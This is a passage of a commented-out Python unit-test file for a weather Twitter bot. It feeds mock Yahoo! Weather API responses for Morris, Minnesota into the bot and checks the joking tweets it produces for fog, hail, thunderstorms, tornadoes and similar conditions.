# ydata2 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '6', 'text': 'Mixed Rain and Sleet'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data2 = weatherBot.get_weather_variables(ydata2)
# self.assertEqual(weatherBot.make_special_tweet(weather_data2),
# 'What a mix! Currently, there\'s mixed rain and sleet falling from the sky.')
# ydata3 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '6', 'text': 'Mixed Snow and Sleet'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data3 = weatherBot.get_weather_variables(ydata3)
# self.assertEqual(weatherBot.make_special_tweet(weather_data3),
# 'What a mix! Currently, there\'s mixed snow and sleet falling from the sky.')
#
# def test_make_special_tweet_fog(self):
# """Testing if fog event is triggered"""
# ydata = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '4', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '20', 'text': 'Fog'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '37', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1), 'Do you even fog bro?')
#
# def test_make_special_tweet_hail(self):
# """Testing if hail event is triggered"""
# ydata1 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '17', 'text': 'Hail'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata1)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1), 'IT\'S HAILIN\'!')
# ydata2 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '35', 'text': 'Mixed Rain and Hail'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data2 = weatherBot.get_weather_variables(ydata2)
# self.assertEqual(weatherBot.make_special_tweet(weather_data2), 'IT\'S HAILIN\'!')
#
# def test_make_special_tweet_thunderstorms(self):
# """Testing if thunderstorm event is triggered"""
# ydata = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '4', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '4', 'text': 'Thunderstorms'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '37', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data = weatherBot.get_weather_variables(ydata)
# self.assertEqual(weatherBot.make_special_tweet(weather_data), 'Meh, just a thunderstorm.')
#
# def test_make_special_tweet_severe_thunderstorms(self):
# """Testing if severe thunderstorm event is triggered"""
# ydata = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '4', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '3', 'text': 'Severe Thunderstorms'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '37', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data = weatherBot.get_weather_variables(ydata)
# self.assertEqual(weatherBot.make_special_tweet(weather_data),
# 'IT BE STORMIN\'! Severe thunderstorms right now.')
#
# def test_make_special_tweet_very_severe_storms(self):
# """Testing if very severe thunderstorm event is triggered"""
# ydata1 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '0', 'text': 'Tornado'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata1)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1), 'HOLY SHIT, THERE\'S A TORNADO!')
# ydata2 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '1', 'text': 'Tropical Storm'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data2 = weatherBot.get_weather_variables(ydata2)
# self.assertEqual(weatherBot.make_special_tweet(weather_data2), 'HOLY SHIT, THERE\'S A TROPICAL STORM!')
# ydata3 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a 